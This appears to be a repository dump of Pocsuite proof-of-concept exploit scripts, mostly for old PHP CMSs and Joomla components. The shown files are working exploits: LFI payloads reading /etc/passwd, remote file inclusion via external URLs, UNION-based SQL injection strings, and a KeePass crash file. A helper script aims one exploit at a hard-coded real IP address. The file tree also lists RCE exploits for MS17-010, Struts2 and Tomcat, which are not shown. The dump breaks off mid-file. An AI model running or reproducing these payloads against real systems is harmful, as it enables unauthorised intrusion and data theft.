├── .DS_Store
├── README.md
├── tmp.py
├── Joomla Component com_pc LFI Vulnerability.py
├── Mafia Moblog 6 Big.PHP Remote File Include Vulnerability.py
├── Clicksor SQL Injecti0n Vulnerability.py
├── KeePass Password Safe Classic 1.29 - Crash.py
├── IDevSpot PHPLinkExchange 1.0 Index.PHP Remote File Include Vulnerability.py
├── DreamAccount _= 3.1 (auth.api.php) Remote File Include Exploit.py
├── dede_reinstall.py
├── GrayCMS 1.1 Error.PHP Remote File Include Vulnerability.py
├── McNews 1.x Install.PHP Arbitrary File Include Vulnerability.py
├── FlatNuke 2.5.7 Index.php Remote File Include Vulnerability.py
├── Gnat-TGP _= 1.2.20 Remote File Include Vulnerability.py
├── Modernbill _= 1.6 (config.php) Remote File Include Vulnerability.py
├── Cyberfolio _= 2.0 RC1 (av) Remote File Include Vulnerabilities.py
├── Azeno CMS SQL Injection Vulnerability.py
├── Insky CMS 006-0111 - Multiple Remote File Include Vulnerability.py
├── MyABraCaDaWeb _= 1.0.3 (base) Remote File Include Vulnerabilities.py
├── galleria Mambo Module _= 1.0b Remote File Include Vulnerability.py
├── AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability.py
├── Angelo-emlak 1.0 - Database Disclosure Vulnerability.py
├── KISGB _= (tmp_theme) 5.1.1 - Local File Inclusion Vulnerability.py
├── dotWidget CMS _= 1.0.6 (file_path) Remote File Include Vulnerabilities.py
├── Hitweb _= 4.2.1 (REP_INC) Remote File Include Vulnerability.py
├── Minerva _= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability.py
├── GeniXCMS 0.0.3 - XSS Vulnerabilities.py
├── Joomla Spider Form Maker _= 3.4 - SQLInjection.py
├── MunkyScripts Simple Gallery SQL Injection Vulnerability.py
├── interact _= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability.py
├── mambo com_babackup Component _= 1.1 File Include Vulnerability.py
├── ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability.py
├── dede_search.php_sqli.py
├── Limbo CMS Module event 1.0 - Remote File Include Vulnerability.py
├── 724CMS _= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability.py
├── Mambo cropimage Component _= 1.0 - Remote File Include Vulnerability.py
├── Joomla Kochsuite Component _= 0.9.4 - Remote File Include Vulnerability.py
├── DirPHP 1.0 - LFI Vulnerability.py
├── Huawei E5331 API验证绕过漏洞.py
├── JASmine _= 0.0.2 (index.php) Remote File Include Vulnerability.py
├── eWebEditor 弱密码漏洞.py
├── GlassFish 任意文件读取漏洞.py
├── _160615_GlassFish_410_file_read.py
├── Dream4 Koobi CMS 4.2.3 Index.PHP Cross-Site Scripting Vulnerability.py
├── _130423_eWebEditor_all_weak_password.py
├── CMS phpshop 2.0 - SQL Injection Vulnerability.py
├── _170826_Zabbix_303_SQL_Injection.py
├── FlexCMS 2.5 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting Vulnerability.py
├── FotoWeb 6.0 Login.fwx s Parameter XSS.py
├── Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp.py
├── _170826_Joomla_345_RCE.py
├── Discuz! Plugin JiangHu _= 1.1 (id) SQL Injection Vulnerability.py
├── MyBB 1.6.5 suffers from a cross site scripting vulnerability.py
├── Apple Macintosh OS X .DS_Store 信息泄露漏洞.py
├── Joomla Spider Calendar _= 3.2.6 - SQL Injection.py
├── _170815_Redis_all_unauthorized.py
├── dede_guestbook_sqli.py
├── _170812_Cacti_all_file_upload.py
├── _180323_180219_Tomcat_7_PUT_RCE.py
├── _160615_Struts2_037_rce.py
├── FlashChat _= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability.py
├── Max's Image Uploader Shell Upload Vulnerability.py
├── Gizzar _= 03162002 (index.php) Remote File Include Vulnerability.py
├── Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS.py
├── Joomla Component com_jequoteform - Local File Inclusion.py
├── IIS 系列 Http.sys 处理 Range 整数溢出漏洞.py
├── joomla! 组件GoogleSearch (CSE) V3.0.2 参数q XSS漏洞.py
├── dede_recommend.php_sqli.py
├── BookingeCMS HotelCMS酒店预订管理系统key和m=info.detail id存在注入.py
├── EMC Cloud Tiering Appliance v10.0 Unauthenticated XXE Arbitrary File Read.py
├── Joomla Component com_carman Cross Site Scripting Vulnerability.py
├── Joomla Component com_job (showMoreUse) SQL injection vulnerability.py
├── joomla component The Estate Agent (com_estateagent) SQL injection Vulnerability.py
├── _180323_170928_Struts2_045_rce.py
├── EZ-Oscommerce 3.1 - Remote File Upload.py
├── _141017_phpMyAdmin_all_weak_password.py
├── Joomla Component simpledownload 0.9.5 - LFI Vulnerability.py
├── Joomla Component (com_jimtawl) Local File Inclusion Vulnerability.py
├── Joomla Component (com_ezautos) SQL Injection Vulnerability.py
├── Joomla Component com_doqment (cid) SQL Injection Vulnerability.py
├── Joomla Component JE Event Calendar SQL Injection Vulnerability.py
├── _170605_SMB_ms17_010_RCE.py
├── Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection.py
├── Joomla Component Ignite Gallery 0.8.3 - SQL Injection Vulnerability.py
├── Joomla RSfiles Component (cid param) - SQL Injection Vulnerability.py
├── HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability.py
├── Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln.py
├── Joomla Kunena Component (index.php, search parameter) SQL Injection.py
├── Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection Vulnerability.py
├── Joomla Component (com_idoblog) SQL Injection Vulnerability.py
├── Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability.py
├── Joomla Jobprofile Component (com_jobprofile) - SQL Injection.py
├── dede_download.php_sqli.php.py
├── ECShop支付宝插件SQL注入漏洞.py
└── _140408_OpenSSL_102_Heartbleed.py
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/njcx/pocsuite_poc_collect/HEAD/.DS_Store
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # pocsuite_poc_collect
2 | collection poc use pocsuite framework 收集一些 poc with pocsuite
3 |
--------------------------------------------------------------------------------
/tmp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding:utf-8
3 |
4 | from pocsuite.api.cannon import Cannon
5 | info = {"pocname": "_170826_Zabbix_303_SQL_Injection",
6 | "pocstring": open("./_170826_Zabbix_303_SQL_Injection.py").read(),
7 | "mode": "verify"}
8 |
9 | target = "http://89.239.138.140"
10 | invoker = Cannon(target, info)
11 | result = invoker.run()
12 | print result
13 |
--------------------------------------------------------------------------------
/Joomla Component com_pc LFI Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import Output, POCBase
6 | from pocsuite.utils import register
7 |
8 | class TestPOC(POCBase):
9 | vulID = '67513'
10 | version = '1'
11 | author = 'p9k4r'
12 | vulDate = '2010-1-17'
13 | createDate = '2015-9-28'
14 | updateDate = '2015-9-28'
15 | references = ['http://www.sebug.net/vuldb/ssvid-67513']
16 | name = 'Joomla Component com_pc LFI Vulnerability'
17 | appPowerLink = 'joomla.org'
18 | appName = 'Joomla Component com_pc'
19 | appVersion = '*'
20 | vulType = 'Local File Inclusion'
21 | desc = 'LFI'
22 | samples = ['']
23 |
24 | def _attack(self):
25 | return self._verify()
26 |
27 | def _verify(self, verify=True):
28 | result = {}
29 | vul_url = '%s/index.php?option=com_pc&controller=../../../../../../../etc/passwd' % self.url
30 | response = req.get(vul_url + '%00', timeout=10).content
31 |
32 | if '/bin/bash' in response:
33 | result['VerifyInfo'] = {}
34 | result['VerifyInfo']['URL'] = self.url
35 |
36 | return self.parse_attack(result)
37 |
38 | def parse_attack(self, result):
39 | output = Output(self)
40 |
41 | if result:
42 | output.success(result)
43 | else:
44 | output.fail('failed')
45 |
46 | return output
47 |
48 |
49 | register(TestPOC)
50 |
--------------------------------------------------------------------------------
/Mafia Moblog 6 Big.PHP Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '81940' # ssvid
10 | version = '1.0'
11 | author = ['皮皮']
12 | vulDate = '2006-08-16'
13 | createDate = '2015-12-24'
14 | updateDate = '2015-12-24'
15 | references = ['http://www.sebug.net/vuldb/ssvid-81940']
16 | name = 'Mafia Moblog 6 Big.PHP Remote File Include Vulnerability'
17 | appPowerLink = ''
18 | appName = 'Mafia Moblog'
19 | appVersion = '6'
20 | vulType = 'Remote File Inclusion'
21 | desc = ''
22 | samples = ['']
23 |
24 |
25 | def _attack(self):
26 | return self._verify()
27 |
28 |
29 | def _verify(self):
30 | result = {}
31 | vul_url = '%s/big.php?pathtotemplate=http://baidu.com/robots.txt?' % self.url
32 | response = req.get(vul_url).content
33 |
34 | if 'Baiduspider' in response and 'Googlebot' in response:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = self.url
37 |
38 | return self.parse_attack(result)
39 |
40 |
41 | def parse_attack(self, result):
42 | output = Output(self)
43 |
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('failed')
48 |
49 | return output
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/Clicksor SQL Injecti0n Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
8 | class TestPOC(POCBase):
9 | vulID = 'SSV-68525' # vul ID
10 | version = '1'
11 | author = 'fenghh'
12 | vulDate = '2010-05-04'
13 | createDate = '2015-10-15'
14 | updateDate = '2015-10-15'
15 | references = ['http://sebug.net/vuldb/ssvid-19358']
16 | name = 'Clicksor SQL Injection Vulnerability'
17 | appPowerLink = 'www.clicksor.com'
18 | appName = 'Clicksor'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | google dock:" Powered by Clicksor.com Contextual Advertising".
23 | index.php?id参数导致过滤
24 | '''
25 | # the sample sites for examine
26 | samples = ['']
27 |
28 | def _verify(self):
29 | output = Output(self)
30 | result = {}
31 | payload = "/index.php?page=view&id=-511 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
32 | verify_url = self.url + payload
33 | content = req.get(verify_url).content
34 | if 'fae0b27c451c728867a567e8c1bb4e53' in content:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = verify_url
37 | output.success(result)
38 | else:
39 | output.fail('SQL Injection Failed')
40 | return output
41 |
42 | def _attack(self):
43 | return self._verify()
44 |
45 | register(TestPOC)
--------------------------------------------------------------------------------
/KeePass Password Safe Classic 1.29 - Crash.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '' # ssvid
10 | version = '1.0'
11 | author = ['抽烟的2b青年']
12 | vulDate = ''
13 | createDate = '2016-01-12'
14 | updateDate = '2016-01-12'
15 | references = ['http://www.sebug.net/vuldb/ssvid-']
16 | name = ''
17 | appPowerLink = ''
18 | appName = ''
19 | appVersion = ''
20 | vulType = ''
21 | desc = '''
22 | '''
23 | samples = ['']
24 |
25 | def _attack(self):
26 | result = {}
27 | #Write your code here
28 | hdr = '"' #start syntax
29 | hcr = "R3Z4" #user
30 | oth = ',"' #user
31 | oth2 = '","",""' #user
32 | val=','
33 | crash = "\x41"*199289 #B0F
34 | exp = hdr+hcr+hdr+val+hdr+hcr+hdr+oth+crash+oth2
35 | file = open("r3z4.csv", "w")
36 | file.write(exp)
37 | file.close()
38 | return self.parse_output(result)
39 |
40 | def _verify(self):
41 | result = {}
42 | #Write your code here
43 |
44 | return self.parse_output(result)
45 |
46 | def parse_output(self, result):
47 | #parse output
48 | output = Output(self)
49 | if result:
50 | output.success(result)
51 | else:
52 | output.fail('Internet nothing returned')
53 | return output
54 |
55 |
56 | register(TestPOC)
--------------------------------------------------------------------------------
/IDevSpot PHPLinkExchange 1.0 Index.PHP Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '81821' # ssvid
10 | version = '1.0'
11 | author = ['皮皮']
12 | vulDate = '2006-07-24'
13 | createDate = '2015-12-24'
14 | updateDate = '2015-12-24'
15 | references = ['http://www.sebug.net/vuldb/ssvid-81821']
16 | name = 'IDevSpot PHPLinkExchange 1.0 Index.PHP Remote File Include Vulnerability'
17 | appPowerLink = ''
18 | appName = 'IDevSpot PHPLinkExchange'
19 | appVersion = '1.0'
20 | vulType = 'Remote File Inclusion'
21 | desc = ''
22 | samples = ['']
23 |
24 |
25 | def _attack(self):
26 | return self._verify()
27 |
28 |
29 | def _verify(self):
30 | result = {}
31 | vul_url = '%s/index.php?page=http://baidu.com/robots.txt' % self.url
32 | response = req.get(vul_url).content
33 |
34 | if 'Googlebot' in response and 'Baiduspider' in response:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = self.url
37 |
38 | return self.parse_attack(result)
39 |
40 |
41 | def parse_attack(self, result):
42 | output = Output(self)
43 |
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('failed')
48 |
49 | return output
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/DreamAccount _= 3.1 (auth.api.php) Remote File Include Exploit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import Output, POCBase
6 | from pocsuite.utils import register
7 |
8 | class TestPOC(POCBase):
9 | vulID = '63672' # ssvid
10 | version = '1.0'
11 | author = ['皮皮']
12 | vulDate = '2006-12-01'
13 | createDate = '2015-12-24'
14 | updateDate = '2015-12-24'
15 | references = ['http://www.sebug.net/vuldb/ssvid-63672']
16 | name = 'DreamAccount <= 3.1 (Authentication.api.php) Remote File Include Exploit'
17 | appPowerLink = ''
18 | appName = 'DreamAccount'
19 | appVersion = '<= 3.1'
20 | vulType = 'Remote File Inclusion'
21 | desc = ''
22 | samples = ['']
23 |
24 |
25 | def _attack(self):
26 | return self._verify()
27 |
28 |
29 | def _verify(self):
30 | result = {}
31 | vul_url = '%s/Authentication.api.php?path=http://baidu.com/robots.txt?' % self.url
32 | response = req.get(vul_url).content
33 |
34 | if 'Baiduspider' in response or 'Googlebot' in response:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = self.url
37 |
38 | return self.parse_attack(result)
39 |
40 |
41 | def parse_attack(self, result):
42 | output = Output(self)
43 |
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('failed')
48 |
49 | return output
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/dede_reinstall.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
8 |
9 | class TestPOC(POCBase):
10 | vulID='5'
11 | version = '1'
12 | author = ['fengxuan']
13 | vulDate = '2016-5-27'
14 | createDate = '2016-2-20'
15 | updateDate = '2016-2-20'
16 | references = ['http://www.evalshell.com', 'http://www.cnseay.com/3714/']
17 | name = 'dedecms install/index.php.bak重装漏洞'
18 | appPowerLink = 'http://www.dedecms.cn/'
19 | appName = 'dedecms'
20 | appVersion = '5.7'
21 | vulType = 'Code Execution'
22 | desc = '''
23 | dedecms
24 | 在默认安装后回生成install/index.php.bak。来判断网站是否安装。
25 | 但是在web容器为apache的情况下,对index.php.bak会解析为php文件
26 | 详情请搜索apache解析漏洞
27 | '''
28 | samples = ['']
29 |
30 | def _attack(self):
31 | return self._verify()
32 |
33 | def _verify(self, verify=True):
34 | result = {}
35 | vul_url = '%s/install/index.php.bak' % self.url
36 |
37 | response = req.get(vul_url)
38 | if response.status_code == 200:
39 | result['VerifyInfo'] = {}
40 | result['VerifyInfo']['URL'] = self.url
41 |
42 | return self.parse_attack(result)
43 |
44 | def parse_attack(self, result):
45 | output = Output(self)
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('Internet nothing returned')
50 | return output
51 |
52 | register(TestPOC)
53 |
--------------------------------------------------------------------------------
/GrayCMS 1.1 Error.PHP Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class GrayCMS_Remote_File_Include(POCBase):
10 | vulID = '79199'
11 | version = '1'
12 | vulDate = '2005-04-26'
13 | author = ' '
14 | createDate = '2015-12-19'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-79199']
17 | name = 'GrayCMS 1.1 Error.PHP Remote File Include Vulnerability'
18 | appPowerLink = ''
19 | appName = 'GrayCMS'
20 | appVersion = '1.1'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/code/error.php?path_prefix=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(GrayCMS_Remote_File_Include)
--------------------------------------------------------------------------------
/McNews 1.x Install.PHP Arbitrary File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class McNews_Remote_File_Include(POCBase):
10 | vulID = '78899'
11 | version = '1'
12 | vulDate = '2005-03-17'
13 | author = ' '
14 | createDate = '2015-12-17'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-78899']
17 | name = 'McNews 1.x Install.PHP Arbitrary File Include Vulnerability'
18 | appPowerLink = ''
19 | appName = 'McNews'
20 | appVersion = '1.x'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/admin/install.php?l=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(McNews_Remote_File_Include)
--------------------------------------------------------------------------------
/FlatNuke 2.5.7 Index.php Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class FlatNuke_Remote_File_Include(POCBase):
10 | vulID = '63616'
11 | version = '1'
12 | vulDate = '2006-07-13'
13 | author = ' '
14 | createDate = '2015-12-16'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-63616']
17 | name = 'FlatNuke 2.5.7 Index.php Remote File Include Vulnerability'
18 | appPowerLink = ''
19 | appName = 'FlatNuke'
20 | appVersion = '2.5.7'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(FlatNuke_Remote_File_Include)
--------------------------------------------------------------------------------
/Gnat-TGP _= 1.2.20 Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class GnatTGP_Remote_File_Include(POCBase):
10 | vulID = '67834'
11 | version = '1'
12 | vulDate = '2010-03-03'
13 | author = ' '
14 | createDate = '2015-12-17'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-67834']
17 | name = 'Gnat-TGP <= 1.2.20 Remote File Include Vulnerability'
18 | appPowerLink = ''
19 | appName = 'Gnat-TGP'
20 | appVersion = '<= 1.2.20'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/includes/tgpinc.php?DOCUMENT_ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(GnatTGP_Remote_File_Include)
--------------------------------------------------------------------------------
/Modernbill _= 1.6 (config.php) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '63791' # ssvid
10 | version = '1.0'
11 | author = ['皮皮']
12 | vulDate = '2006-08-09'
13 | createDate = '2015-12-24'
14 | updateDate = '2015-12-24'
15 | references = ['http://www.sebug.net/vuldb/ssvid-63791']
16 | name = 'Modernbill <= 1.6 (config.php) Remote File Include Vulnerability'
17 | appPowerLink = 'http://freshmeat.net/projects/modernbill/'
18 | appName = 'Modernbill'
19 | appVersion = '<= 1.6'
20 | vulType = 'Remote File Inclusion'
21 | desc = ''
22 | samples = ['']
23 |
24 |
25 | def _attack(self):
26 | return self._verify()
27 |
28 |
29 | def _verify(self):
30 | result = {}
31 | vul_url = '%s/include/html/config.php?DIR=http://baidu.com/robots.txt?' % self.url
32 | response = req.get(vul_url).content
33 |
34 | if 'Baiduspider' in response and 'Googlebot' in response:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = self.url
37 |
38 | return self.parse_attack(result)
39 |
40 |
41 | def parse_attack(self, result):
42 | output = Output(self)
43 |
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('failed')
48 |
49 | return output
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/Cyberfolio _= 2.0 RC1 (av) Remote File Include Vulnerabilities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class Cyberfolio_Remote_File_Include(POCBase):
10 | vulID = '64221'
11 | version = '1'
12 | vulDate = '2006-11-06'
13 | author = ' '
14 | createDate = '2015-12-20'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-64221']
17 | name = 'Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities'
18 | appPowerLink = ''
19 | appName = 'Cyberfolio'
20 | appVersion = '<= 2.0'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/portfolio/msg/view.php?av=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 | return self.parse_attack(result)
40 |
41 |
42 | def parse_attack(self, result):
43 | output = Output(self)
44 |
45 | if result:
46 | output.success(result)
47 | else:
48 | output.fail('failed')
49 |
50 | return output
51 |
52 | register(Cyberfolio_Remote_File_Include)
--------------------------------------------------------------------------------
/Azeno CMS SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
8 | class TestPOC(POCBase):
9 | vulID = 'SSV-67893' # vul ID
10 | version = '1'
11 | author = 'hzr'
12 | vulDate = '2010-03-13'
13 | createDate = '2015-10-23'
14 | updateDate = '2015-10-23'
15 | references = ['https://www.exploit-db.com/exploits/11711/']
16 | name = 'Azeno CMS - SQL Injection Vulnerability'
17 | appPowerLink = 'N/A'
18 | appName = 'Azeno'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Azeno CMS的/admin/index.php 文件"id" 变量没有进行过滤,造成SQL注入
23 | '''
24 | # the sample sites for examine
25 | samples = ['']
26 |
27 | def _verify(self):
28 | output = Output(self)
29 | result = {}
30 | #根据Pocsuite格式要求,定义一个特殊输出字符串,验证sql注入是否成功
31 | payload = "/admin/index.php?id=-1 UNION SELECT 1,CONCAT(0x7165696a71,CAST(md5(23333) AS CHAR),0x20),3,4,5,6,7 FROM dc_user"
32 | verify_url = self.url + payload
33 | content = req.get(verify_url).content
34 | if "qeijq0ba7bc92fcd57e337ebb9e74308c811f" in content:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = verify_url
37 | output.success(result)
38 | else:
39 | output.fail('SQL Injection Failed')
40 | return output
41 |
42 | def _attack(self):
43 | return self._verify()
44 |
45 | register(TestPOC)
--------------------------------------------------------------------------------
/Insky CMS 006-0111 - Multiple Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class Insky_CMS_Remote_File_Include(POCBase):
10 | vulID = '68005'
11 | version = '1'
12 | vulDate = '2006-06-25'
13 | author = ' '
14 | createDate = '2015-12-20'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-68005']
17 | name = 'Insky CMS 006-0111 - Multiple Remote File Include Vulnerability'
18 | appPowerLink = ''
19 | appName = 'Insky CMS'
20 | appVersion = '006-0111'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/modules/city.get/city.get.php?ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 | return self.parse_attack(result)
40 |
41 |
42 | def parse_attack(self, result):
43 | output = Output(self)
44 |
45 | if result:
46 | output.success(result)
47 | else:
48 | output.fail('failed')
49 |
50 | return output
51 |
52 | register(Insky_CMS_Remote_File_Include)
--------------------------------------------------------------------------------
/MyABraCaDaWeb _= 1.0.3 (base) Remote File Include Vulnerabilities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class MyABraCaDaWeb_Remote_File_Include(POCBase):
10 | vulID = '63954'
11 | version = '1'
12 | vulDate = '2006-09-08'
13 | author = ' '
14 | createDate = '2015-12-16'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-63954']
17 | name = 'MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities'
18 | appPowerLink = ''
19 | appName = 'MyABraCaDaWeb'
20 | appVersion = '<= 1.0.3'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
